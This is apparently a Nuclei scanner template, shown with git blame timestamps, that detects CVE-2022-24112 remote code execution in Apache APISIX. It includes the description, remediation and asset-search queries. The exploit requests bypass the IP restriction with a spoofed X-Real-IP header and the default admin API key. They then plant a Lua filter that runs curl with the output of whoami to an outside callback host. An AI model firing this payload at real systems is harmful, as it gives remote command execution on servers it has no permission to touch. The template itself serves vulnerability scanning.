2022-02-23 07:55:27 +00:00
id : CVE-2022-24112
info :
2022-04-25 14:35:07 +00:00
name : Apache APISIX - Remote Code Execution
2022-02-23 07:55:27 +00:00
author : Mr-xn
severity : critical
2022-04-25 14:35:07 +00:00
description : A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
2022-02-23 07:55:27 +00:00
reference :
- https://www.openwall.com/lists/oss-security/2022/02/11/3
- https://twitter.com/sirifu4k1/status/1496043663704858625
- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
2022-04-25 14:35:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-24112
2023-07-11 19:49:27 +00:00
- http://www.openwall.com/lists/oss-security/2022/02/11/3
2022-05-17 09:18:12 +00:00
remediation : Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
2022-02-23 07:55:27 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-02-23 07:55:27 +00:00
cve-id : CVE-2022-24112
cwe-id : CWE-290
2023-08-31 11:46:18 +00:00
epss-score : 0.97343
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.99829
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-04-22 10:38:41 +00:00
fofa-query : title="Apache APISIX Dashboard"
2023-07-11 19:49:27 +00:00
product : apisix
2022-05-17 09:18:12 +00:00
shodan-query : title:"Apache APISIX Dashboard"
2023-07-11 19:49:27 +00:00
vendor : apache
tags : cve,cve2022,apache,rce,apisix,oast,kev,intrusive
2022-02-23 07:55:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-23 07:55:27 +00:00
- raw :
- |
POST /apisix/batch-requests HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9
{
"headers" : {
"X-Real-IP" : "127.0.0.1" ,
"Content-Type" : "application/json"
},
"timeout" : 1500 ,
"pipeline" : [
{
"method" : "PUT" ,
"path" : "/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1" ,
2022-08-25 15:20:19 +00:00
"body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}"
2022-02-23 07:55:27 +00:00
}
]
}
- |
GET /api/{{randstr}} HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9
req-condition : true
2023-07-11 19:49:27 +00:00
2022-02-23 07:55:27 +00:00
matchers-condition : and
matchers :
- type : word
part : body_1
words :
- '"reason":"OK"'
- '"status":200'
condition : and
- type : word
part : interactsh_protocol
words :
2023-07-11 19:49:27 +00:00
- http
- type : status
status :
- 200
2022-02-23 07:55:27 +00:00
extractors :
- type : regex
group : 1
regex :
2023-07-11 19:49:27 +00:00
- GET \/([a-z-]+) HTTP
part : interactsh_request